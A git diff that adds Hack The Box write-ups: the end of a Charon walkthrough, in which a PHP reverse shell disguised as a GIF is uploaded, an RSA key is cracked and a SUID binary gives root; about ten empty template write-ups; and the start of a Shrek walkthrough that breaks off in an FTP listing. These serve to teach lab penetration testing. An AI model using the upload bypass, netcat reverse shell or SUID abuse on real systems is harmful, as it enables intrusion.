+ # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
+ # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
+ # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
+ # By Zion3R #
+ # www.Blackploit.com #
+ # Root@Blackploit.com #
+ #########################################################################
+ --------------------------------------------------
+ HASH: 0b0689ba94f94533400f4decd87fa260
+
+ Possible Hashs:
+ [+] MD5
+ [+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
+
+
+And we see that it is a md5 hash, we can use john or hashcat in conjunction with wordlists, but for this example we'll just use an online hash cracker: https://www.onlinehashcrack.com
+
+ 
+
+And finally we have the credentials **super_cms_adm:tamarro** So we use them to login:
+
+
+
+Once logged in we see a big red flag, we are able to upload an image, so we'll try to inject a reverse shell there:
+
+
+
+So here let's make our own simple php reverse shell:
+
+
+
+But when we upload it we see that we need to make sure the file extension is correct:
+
+
+
+So let's disguise our reverse php shell as a gif, making sure the magicbytes are also correct:
+
+ 
+
+Here we see 2 interesting things once we upload our reverse php gif : we get the **relative** path of our gif : ../images/nothing.php.gif and a hidden input with a b64 name
+
+
+
+Unsure as to what to do with that, we'll just try to access our reverse php gif and get a reverse shell:
+
+ 
+
+Now that we see our reverse php gif not working, that's where we know we have to make use of this "testfile1" which is a new imput field to the form named testfile1 and setting the value to writeup.php, causes the page to rename the uploaded file to the value specified. So let's intercept the upload.php webpage itself in bursuite, in order to modify the php file itself,in order to have a the new "testfile1" input field:
+
+
+
+Now that we have the request, we do Action > Do intercept > Response to this Request and then just hit "forward"
+
+
+
+Then we make sure the other input field is uncommented and named properly and forward the request:
+
+
+
+This allows us to submit a gif file to then rename it to a php file, so let's submit it and browse to it:
+
+
+
+It uploads successfully so let's browse to it at **http://10.10.10.31/images/nothing.php** :
+
+
+
+And there we have a reverse shell as www-data ! now let's poke around but before that let's upgrade our reverse shell to a fully interactive one:
+
+
+ www-data@charon:/var/www/html/freeeze/images$ which python
+ which python
+ /usr/bin/python
+
+
+Python is there for us to use, so let's use the pty module to spawn a TTY shell:
+
+
+ www-data@charon:/var/www/html/freeeze/images$ python -c 'import pty;pty.spawn("/bin/bash")'
+ www-data@charon:/var/www/html/freeeze/images$ ^Z
+ [1]+ Stopped nc -lvnp 9001
+
+ [ 10.10.14.8/23 ] [ /dev/pts/16 ] [~]
+ → stty raw -echo
+
+ [ 10.10.14.8/23 ] [ /dev/pts/16 ] [~]
+ → nc -lvnp 9001
+
+ www-data@charon:/var/www/html/freeeze/images$
+ www-data@charon:/var/www/html/freeeze/images$
+ www-data@charon:/var/www/html/freeeze/images$
+
+
+once we got the tty shell from python, we background our netcat process with CTRL+Z then type in stty raw -echo and then **fg** to get back into our netcat reverse shell and we now have our fully interactive reverse shell:
+
+
+ www-data@charon:/var/www/html/freeeze/images$ ls -lash
+ ls -lash
+ total 904K
+ 4.0K drwxr-xrwx 3 root root 4.0K Aug 13 14:43 .
+ 4.0K drwxr-xrwx 8 root root 4.0K Jun 26 2017 ..
+ 72K -rwxr-xr-x 1 root root 72K Dec 23 2016 berries.png
+ 4.0K -rwxr-xr-x 1 root root 1.2K Dec 23 2016 bg-border.gif
+ 64K -rwxr-xr-x 1 root root 62K Dec 23 2016 bg-header-about.jpg
+ 152K -rwxr-xr-x 1 root root 152K Dec 23 2016 bg-home.jpg
+ 4.0K -rwxr-xr-x 1 root root 994 Dec 23 2016 bg-transparent.png
+ 20K -rwxr-xr-x 1 root root 19K Dec 23 2016 blackberry.jpg
+ 20K -rwxr-xr-x 1 root root 19K Dec 23 2016 blueberry.jpg
+ 20K -rwxr-xr-x 1 root root 19K Dec 23 2016 cantaloupe.jpg
+ 4.0K -rwxr-xr-x 1 root root 2.7K Dec 23 2016 check-in.png
+ 4.0K -rwxr-xr-x 1 root root 3.7K Jun 23 2017 f.png
+ 24K -rwxr-xr-x 1 root root 21K Dec 23 2016 grapes.jpg
+ 24K -rwxr-xr-x 1 root root 21K Dec 23 2016 green-apple.jpg
+ 16K -rwxr-xr-x 1 root root 13K Dec 23 2016 icons.png
+ 20K -rwxr-xr-x 1 root root 17K Dec 23 2016 kiwi.jpg
+ 8.0K -rwxr-xr-x 1 root root 7.1K Jun 23 2017 logo.png
+ 20K -rwxr-xr-x 1 root root 18K Dec 23 2016 mango.jpg
+ 60K -rwxr-xr-x 1 root root 60K Dec 23 2016 map.jpg
+ 4.0K drwxr-xr-x 2 root root 4.0K Dec 23 2016 mobile
+ 84K -rwxr-xr-x 1 root root 82K Dec 23 2016 new-chills.png
+ 4.0K -rw-r--r-- 1 www-data www-data 83 Aug 13 14:43 nothing.php
+ 4.0K -rw-r--r-- 1 www-data www-data 83 Aug 13 13:56 nothing.php.gif
+ 84K -rwxr-xr-x 1 root root 82K Dec 23 2016 on-diet.png
+ 20K -rwxr-xr-x 1 root root 20K Dec 23 2016 pineapple.jpg
+ 4.0K -rw-r--r-- 1 www-data www-data 103 Jun 26 2017 small.png
+ 20K -rwxr-xr-x 1 root root 20K Dec 23 2016 strawberry.jpg
+ 116K -rwxr-xr-x 1 root root 116K Dec 23 2016 strwberry-delights.jpg
+ 20K -rwxr-xr-x 1 root root 20K Dec 23 2016 yogurt.jpg
+
+
+ www-data@charon:/var/www/html/freeeze/images$ cd /home/
+ www-data@charon:/home$ ls
+ decoder
+ www-data@charon:/home$ cd decoder/
+ www-data@charon:/home/decoder$ ls -lash
+ total 40K
+ 4.0K drwxr-xr-x 3 decoder freeeze 4.0K Jun 26 2017 .
+ 4.0K drwxr-xr-x 3 root root 4.0K Jun 23 2017 ..
+ 4.0K -rw-r--r-- 1 decoder freeeze 220 Sep 1 2015 .bash_logout
+ 4.0K -rw-r--r-- 1 decoder freeeze 3.7K Jun 25 2017 .bashrc
+ 4.0K drwx------ 2 decoder freeeze 4.0K Jun 23 2017 .cache
+ 4.0K -rw-r--r-- 1 decoder freeeze 654 Jun 25 2017 .profile
+ 4.0K -rw------- 1 decoder freeeze 601 Jun 26 2017 .viminfo
+ 4.0K -rw-r--r-- 1 decoder freeeze 138 Jun 23 2017 decoder.pub
+ 4.0K -rw-r--r-- 1 decoder freeeze 32 Jun 23 2017 pass.crypt
+ 4.0K -r-------- 1 decoder freeeze 33 Jun 23 2017 user.txt
+ www-data@charon:/home/decoder$ cat user.txt
+ cat: user.txt: Permission denied
+ www-data@charon:/home/decoder$ file decoder.pub && file pass.crypt
+ decoder.pub: ASCII text
+ pass.crypt: data
+ www-data@charon:/home/decoder$
+
+
+
+after poking around a bit we found out that we (www-data) couldn't read the user flag, but we have access to decoder.pub and pass.crypt
+
+
+ www-data@charon:/home/decoder$ cat decoder.pub
+ -----BEGIN PUBLIC KEY-----
+ MDwwDQYJKoZIhvcNAQEBBQADKwAwKAIhALxHhYGPVMYmx3vzJbPPAEa10NETXrV3
+ mI9wJizmFJhrAgMBAAE=
+ -----END PUBLIC KEY-----
+
+ www-data@charon:/home/decoder$ cat pass.crypt
+ 2OSb"eWgTo7I
+
+
+
+So let's just save both locally (it's easy since they are small files, you can just copy paste them into nano)
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/17 ] [~/_HTB/Charon]
+ → ls
+ nothing.php.gif
+
+ [ 10.10.14.8/23 ] [ /dev/pts/17 ] [~/_HTB/Charon]
+ → wget http://10.10.10.31:9999/decoder.pub
+ --2020-08-13 15:50:36-- http://10.10.10.31:9999/decoder.pub
+ Connecting to 10.10.10.31:9999... ^C
+
+ [ 10.10.14.8/23 ] [ /dev/pts/17 ] [~/_HTB/Charon]
+ → nano decoder.pub
+
+ [ 10.10.14.8/23 ] [ /dev/pts/17 ] [~/_HTB/Charon]
+ → nano pass.crypt
+
+ [ 10.10.14.8/23 ] [ /dev/pts/17 ] [~/_HTB/Charon]
+ → ls -lash
+ total 24K
+ 4.0K drwxr-xr-x 2 nothing nothing 4.0K Aug 13 15:52 .
+ 4.0K drwxr-xr-x 4 nothing nothing 4.0K Aug 13 14:34 ..
+ 4.0K -rw-r--r-- 1 nothing nothing 138 Aug 13 15:51 decoder.pub
+ 4.0K -rw-r--r-- 1 nothing nothing 83 Aug 13 15:19 nothing.php.gif
+ 4.0K -rw-r--r-- 1 nothing nothing 1.0K Aug 13 15:18 .nothing.php.gif.swp
+ 4.0K -rw-r--r-- 1 nothing nothing 13 Aug 13 15:52 pass.crypt
+
+
+
+Here we'll crack the weak RSA key using RsaCtfTool.py:
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/18 ] [~/_HTB/Charon]
+ →/opt/RsaCtfTool/RsaCtfTool.py --publickey decoder.pub --uncipher pass.crypt
+ [+] Clear text : nevermindthebollocks
+
+
+And we have decoder's password! so let's login via ssh as the decoder user:
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/18 ] [~/_HTB/Charon]
+ → ssh decoder@10.10.10.31
+ The authenticity of host '10.10.10.31 (10.10.10.31)' can't be established.
+ ECDSA key fingerprint is SHA256:V1uA1jbcL+1r8UE/foqVjb2u9rSiGTP6EB1Q374Zp9o.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.31' (ECDSA) to the list of known hosts.
+ decoder@10.10.10.31's password:
+ Permission denied, please try again.
+ decoder@10.10.10.31's password:
+ Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-81-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ 34 packages can be updated.
+ 23 updates are security updates.
+
+
+ $ id
+ uid=1001(decoder) gid=1001(freeeze) groups=1001(freeeze)
+ $ cat user.txt
+ 0fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! We have been able to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+To be able to read the root flag, we first need to privesc, so we find the files with the SUID bit set and find a file called supershell in /usr/local/bin directory
+
+
+ $ find / -perm -4000 2>/dev/null
+ **/usr/local/bin/supershell**
+ /usr/lib/openssh/ssh-keysign
+ /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
+ /usr/lib/dbus-1.0/dbus-daemon-launch-helper
+ /usr/lib/snapd/snap-confine
+ /usr/lib/policykit-1/polkit-agent-helper-1
+ /usr/lib/eject/dmcrypt-get-device
+ /usr/bin/pkexec
+ /usr/bin/sudo
+ /usr/bin/chfn
+ /usr/bin/newgrp
+ /usr/bin/gpasswd
+ /usr/bin/chsh
+ /usr/bin/passwd
+ /usr/bin/at
+ /usr/bin/newgidmap
+ /usr/bin/newuidmap
+ /bin/ntfs-3g
+ /bin/ping6
+ /bin/mount
+ /bin/fusermount
+ /bin/umount
+ /bin/ping
+ /bin/su
+
+
+When we run this binary we find that we can run any shell command using it. So we can use it to open the root.txt file:
+
+
+
+ $ supershell "/bin/ls$/
+ > cat /root/root.txt
+ > "
+ Supershell (very beta)
+ ++[/bin/ls$/
+ cat /root/root.txt
+ ]
+ sh: 1: /bin/ls$/: not found
+ c5XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! We have been able to read the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Hard/30.md b/Hard/30.md
new file mode 100644
index 0000000..17ae6b1
--- /dev/null
+++ b/Hard/30.md
@@ -0,0 +1,66 @@
+# ForwardSlash Writeup
+
+
+
+## Introduction :
+
+the text goes here
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/31.md b/Hard/31.md
new file mode 100644
index 0000000..92cce74
--- /dev/null
+++ b/Hard/31.md
@@ -0,0 +1,66 @@
+# Quick Writeup
+
+
+
+## Introduction :
+
+the text goes here
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/32.md b/Hard/32.md
new file mode 100644
index 0000000..4dbc0cf
--- /dev/null
+++ b/Hard/32.md
@@ -0,0 +1,66 @@
+# Travel Writeup
+
+
+
+## Introduction :
+
+the text goes here
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/33.md b/Hard/33.md
new file mode 100644
index 0000000..d1dc6de
--- /dev/null
+++ b/Hard/33.md
@@ -0,0 +1,66 @@
+# Blackfield Writeup
+
+
+
+## Introduction :
+
+the text goes here
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/34.md b/Hard/34.md
new file mode 100644
index 0000000..9c7b9a8
--- /dev/null
+++ b/Hard/34.md
@@ -0,0 +1,66 @@
+# Intense Writeup
+
+
+
+## Introduction :
+
+the text goes here
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/35.md b/Hard/35.md
new file mode 100644
index 0000000..44be1f5
--- /dev/null
+++ b/Hard/35.md
@@ -0,0 +1,66 @@
+# Unbalanced Writeup
+
+
+
+## Introduction :
+
+the text goes here
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/36.md b/Hard/36.md
new file mode 100644
index 0000000..2ac45c3
--- /dev/null
+++ b/Hard/36.md
@@ -0,0 +1,66 @@
+# Feline Writeup
+
+
+
+## Introduction :
+
+the text goes here
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/37.md b/Hard/37.md
new file mode 100644
index 0000000..85a7950
--- /dev/null
+++ b/Hard/37.md
@@ -0,0 +1,66 @@
+# Compromised Writeup
+
+
+
+## Introduction :
+
+the text goes here
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/38.md b/Hard/38.md
new file mode 100644
index 0000000..dbe22c7
--- /dev/null
+++ b/Hard/38.md
@@ -0,0 +1,66 @@
+# Reel2 Writeup
+
+
+
+## Introduction :
+
+the text goes here
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/39.md b/Hard/39.md
new file mode 100644
index 0000000..c259964
--- /dev/null
+++ b/Hard/39.md
@@ -0,0 +1,66 @@
+# Sharp Writeup
+
+
+
+## Introduction :
+
+the text goes here
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
+ → sudo nmap -sCV -p1,2 10.10.10.1
+
+
+## **Part 2 : Getting User Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+the text goes here
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
diff --git a/Hard/4.md b/Hard/4.md
new file mode 100644
index 0000000..2739444
--- /dev/null
+++ b/Hard/4.md
@@ -0,0 +1,636 @@
+# Shrek Writeup
+
+
+
+## Introduction :
+
+Shrek is a hard linux box released back in august 2017
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.27/23 ] [ /dev/pts/18 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.47 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+ Discovered open port 80/tcp on 10.10.10.47
+ Discovered open port 22/tcp on 10.10.10.47
+ Discovered open port 21/tcp on 10.10.10.47
+
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.27/23 ] [ /dev/pts/18 ] [~]
+ → nmap -sCV -p21,22,80 10.10.10.47
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-10 19:04 BST
+ Nmap scan report for 10.10.10.47
+ Host is up (0.029s latency).
+
+ PORT STATE SERVICE VERSION
+ 21/tcp open ftp vsftpd 3.0.3
+ 22/tcp open ssh OpenSSH 7.5 (protocol 2.0)
+ | ssh-hostkey:
+ | 2048 2d:a7:95:95:5d:dd:75:ca:bc:de:36:2c:33:f6:47:ef (RSA)
+ | 256 b5:1f:0b:9f:83:b3:6c:3b:6b:8b:71:f4:ee:56:a8:83 (ECDSA)
+ |_ 256 1f:13:b7:36:8d:cd:46:6c:29:6d:be:e4:ab:9c:24:5b (ED25519)
+ 80/tcp open http Apache httpd 2.4.27 ((Unix))
+ | http-methods:
+ |_ Potentially risky methods: TRACE
+ |_http-server-header: Apache/2.4.27 (Unix)
+ |_http-title: Home
+ Service Info: OS: Unix
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 10.10 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan says that port 80 is opened, so let's investigate it:
+
+
+
+
+
+ [ 10.10.14.27/23 ] [ /dev/pts/18 ] [~]
+ → gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x "xml,php,html,js,txt" -u http://10.10.10.47/
+ ===============================================================
+ Gobuster v3.0.1
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
+ ===============================================================
+ [+] Url: http://10.10.10.47/
+ [+] Threads: 50
+ [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
+ [+] Status codes: 200,204,301,302,307,401,403
+ [+] User Agent: gobuster/3.0.1
+ [+] Extensions: txt,xml,php,html,js
+ [+] Timeout: 10s
+ ===============================================================
+ 2020/08/10 19:08:04 Starting gobuster
+ ===============================================================
+ /images (Status: 301)
+ /uploads (Status: 301)
+ /upload.php (Status: 200)
+ /upload.html (Status: 200)
+ /About.html (Status: 200)
+ /Index.html (Status: 200)
+ /Gallery.html (Status: 200)
+ /Sitemap.html (Status: 200)
+ /memes (Status: 301)
+ /shrek (Status: 301)
+
+
+
+so the interesting webpages here are /uploads.html and /uploads.php:
+
+
+
+When we upload any file there we get redirected to /uploads.php:
+
+
+
+Looking at /uploads we get a directory listing which contains a bunch of malware but the timestamps show us that it's probably not going to help us:
+
+
+
+The interesting file to lookat here is secret_ultimate.php:
+
+
+
+However we don't get to see the php comments, so we hit CTRL+U to view the sourcecode:
+
+
+
+Which hints us to the /secret_area_51/ directory:
+
+
+
+So apparently we get a mp3 containing some music, but the trick here was to inspect the end of the song because there was some extra static in the end after the music fades out:
+
+
+
+The trick here was to inspect this static in Spectogram:
+
+
+
+Here we see something interesting at the top of the stereo channels under spectogram settings we increase the max frequency times 10 which reveals the following message:
+
+ 
+
+And looks like we got ftp credentials! **donkey:d0nk3y1337!** so we login via ftp:
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/5 ] [~/_HTB/Shrek]
+ → ftp 10.10.10.47
+ Connected to 10.10.10.47.
+ 220 (vsFTPd 3.0.3)
+ Name (10.10.10.47:nothing): donkey
+ 331 Please specify the password.
+ Password:
+ 230 Login successful.
+ Remote system type is UNIX.
+ Using binary mode to transfer files.
+ ftp> ls
+ 200 PORT command successful. Consider using PASV.
+ 150 Here comes the directory listing.
+ -rw-r--r-- 1 0 0 9216 Aug 14 09:01 0a935efe212d455eaba901f743e76a1f.txt
+ -rw-r--r-- 1 0 0 7168 Aug 14 09:01 129a5d725798449cbe35c14226c21ec8.txt
+ -rw-r--r-- 1 0 0 11264 Aug 14 09:01 173224a539f74d5bbd78bd097884a445.txt
+ -rw-r--r-- 1 0 0 15360 Aug 14 09:01 1cf72311c8394b85bee71378452a0627.txt
+ -rw-r--r-- 1 0 0 3072 Aug 14 09:01 2d0b3a4e22dc4043976529e9e450839d.txt
+ -rw-r--r-- 1 0 0 3072 Aug 14 09:01 2fdfec98b6f54a4bb2c24492804ed23e.txt
+ -rw-r--r-- 1 0 0 15360 Aug 14 09:01 3416a6f48fb7407e8bfa58ee7869b4c9.txt
+ -rw-r--r-- 1 0 0 15360 Aug 14 09:01 35ed54b85fda4c728e28d043ceff403f.txt
+ -rw-r--r-- 1 0 0 7168 Aug 14 09:01 3896633fd0f44d5789df5366050ecc4f.txt
+ -rw-r--r-- 1 0 0 14336 Aug 14 09:01 40c2e657bcc54c78be1986e9bb45886a.txt
+ -rw-r--r-- 1 0 0 15390 Aug 14 09:01 4328526e95f2406d8af2428b92a3afa8.txt
+ -rw-r--r-- 1 0 0 3072 Aug 14 09:01 549fe668212042acbcc96af1758141a4.txt
+ -rw-r--r-- 1 0 0 6144 Aug 14 09:01 629ac3a5efe24adaa7b5172f8bda44ca.txt
+ -rw-r--r-- 1 0 0 8192 Aug 14 09:01 631385a5a1ce4e46a206f0f0fbdc0808.txt
+ -rw-r--r-- 1 0 0 6144 Aug 14 09:01 68b211ee5513471e8b7de17661d18a9d.txt
+ -rw-r--r-- 1 0 0 13312 Aug 14 09:01 6aee99ecf1aa4ce78ee8d990e2c91e9a.txt
+ -rw-r--r-- 1 0 0 15360 Aug 14 09:01 79947ab62f1a4b959b68ada2b7849ff2.txt
+ -rw-r--r-- 1 0 0 5120 Aug 14 09:01 7ef381dce26a488493df64b67f3db3cf.txt
+ -rw-r--r-- 1 0 0 5120 Aug 14 09:01 84644e19171e425d8ac6e6e7a1398c46.txt
+ -rw-r--r-- 1 0 0 15360 Aug 14 09:01 9c11f948f169414cb4d3cfb607850e58.txt
+ -rw-r--r-- 1 0 0 6144 Aug 14 09:01 9de89e29bdb64a5eb69f1a8f344cd85a.txt
+ -rw-r--r-- 1 0 0 5120 Aug 14 09:01 a1127bfd922e43f0b0007b147c26e11e.txt
+ -rw-r--r-- 1 0 0 7168 Aug 14 09:01 a381c21f0e874439a1a634a940eaf4a9.txt
+ -rw-r--r-- 1 0 0 7168 Aug 14 09:01 b26e893ae4b84ca28872fc519c3803fc.txt
+ -rw-r--r-- 1 0 0 8192 Aug 14 09:01 b2edd39d22674696a56a7939af2ff917.txt
